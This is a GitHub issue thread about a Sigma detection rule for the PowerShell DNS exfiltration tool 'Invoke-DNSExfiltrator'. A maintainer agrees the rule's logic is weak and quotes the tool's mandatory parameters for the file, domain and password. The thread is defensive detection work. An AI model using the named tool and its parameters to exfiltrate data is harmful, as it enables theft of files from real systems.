Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

DNS Exfiltration rule #4889

Open
pramodpabbati opened this issue Jun 25, 2024 · 2 comments
Open

DNS Exfiltration rule #4889

pramodpabbati opened this issue Jun 25, 2024 · 2 comments
Assignees
Labels
Work In Progress Some changes are needed

Comments

@pramodpabbati
Copy link

Hello!

Just reviewing the DNS exfiltration rule at - https://github.com/SigmaHQ/sigma/blob/master/rules/windows/powershell/powershell_script/posh_ps_invoke_dnsexfiltration.yml and was curious on the detection logic of looking for "Invoke-DNSExfiltrator" OR all of the flags its running with.

Based on the references and the wiki for the tool, it doesn't look like the detection logic is accurate. Could you please confirm?

Kind Regards,
Pramod

Copy link
Contributor

Welcome @pramodpabbati 👋

It looks like this is your first issue on the Sigma rules repository!

The following repository accepts issues related to false positives or 'rule ideas'.

If you're reporting an issue related to the pySigma library please consider submitting it here

If you're reporting an issue related to the deprecated sigmac library please consider submitting it here

Thanks for taking the time to open this issue, and welcome to the Sigma community! 😃

@nasbench nasbench added the Work In Progress Some changes are needed label Jun 25, 2024
@nasbench nasbench self-assigned this Jun 25, 2024
@nasbench
Copy link
Member

Hi @pramodpabbati and thanks for opening this issue.

After looking at the rule in question, it can indeed be improved. The rule focused on using the same args in the ART example in order to cover potential "renames" of the cmdlets. But as its shown by the source code on 3 flags are mandatory.

      file:           [MANDATORY] The file name to the file to be exfiltrated.
      domainName:     [MANDATORY] The domain name to use for DNS requests.
      password:       [MANDATORY] Password used to encrypt the data to be exfiltrated.

And these alone cannot be used to identify the cmdlets. I will work on this and try to enhance the logic a bit more.

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
Work In Progress Some changes are needed
Projects
None yet
Development

No branches or pull requests

2 participants